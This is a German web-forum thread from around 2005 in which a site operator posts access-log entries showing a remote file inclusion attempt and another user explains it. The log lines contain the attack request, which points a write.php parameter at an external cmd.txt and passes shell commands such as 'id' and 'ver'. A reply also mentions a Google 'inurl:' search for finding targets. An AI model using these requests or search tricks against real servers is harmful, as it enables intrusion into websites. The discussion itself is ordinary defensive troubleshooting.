168.115.64.21

[robo]

Aus einem Logfile:

168.115.64.21 - - [30/Aug/2005:17:58:07 +0200] "GET /Mietwagen/include/write.php?dir=https://www.dynalith.com/2003/iPROVE/in ... xt?&cmd=id HTTP/1.1" 404 2970 "-" "-"
168.115.64.21 - - [30/Aug/2005:18:10:50 +0200] "GET /Mietwagen/include/write.php?dir=https://www.dynalith.com/2003/iPROVE/in ... t?&cmd=ver HTTP/1.1" 404 2970 "-" "-"

Irgendjemand 'ne Ahnung, was da versucht wird?

cu, Robo

[oldInternetUser]

Na ja, ein Blick auf

https://www.dynalith.com/2003/iPROVE/include/cmd.txt

lehrt, daß da versucht wird, Code nachzuladen, um den Server zu hacken, das, was als cmd übergeben wird, wird ausgeführt (Versionsabfrage).

Offenbar gibt es höchst unsichere write.php-Scripte.

[robo]

Hmm ... auf dem Server gibt es zwar /Mietwagen/, aber weder /Mietwagen/include/ noch /Mietwagen/include/write.php. Und was soll write.php sein? Ist das irgendein weitverbreitetes Script wie z. B. formmail.pl? Wie kommt der Angreifer auf die absurde Idee, es könnte auf dem Server /Mietwagen/include/write.php geben? Und warum sollte write.php den Code nachladen und ausführen?

cu, Robo

[oldInternetUser]

Es gibt unsichere Scripte und CMS in Massen, da wird irgendeines eine Struktur /Hauptordner/include/write.php haben und bsp. besonders gerne von Autoverleihern eingesetzt werden. Und wenn das Script Pfadparameter nicht korrekt prüft und einfach alles lädt und ausführt, was es bekommt (egal, von welchem Server), dann ist das banal.

Adressen kriegt man per google - inurl:/Mietwagen/

PS: Wenn man sich auch nur ein wenig mit Sicherheit beschäftigt, müßte das offene Scheunentor eigentlich klar sein.

[robo]

PS: Wenn man sich auch nur ein wenig mit Sicherheit beschäftigt, müßte das offene Scheunentor eigentlich klar sein.

Es gibt keins. Jedenfalls nicht hier.

cu, Robo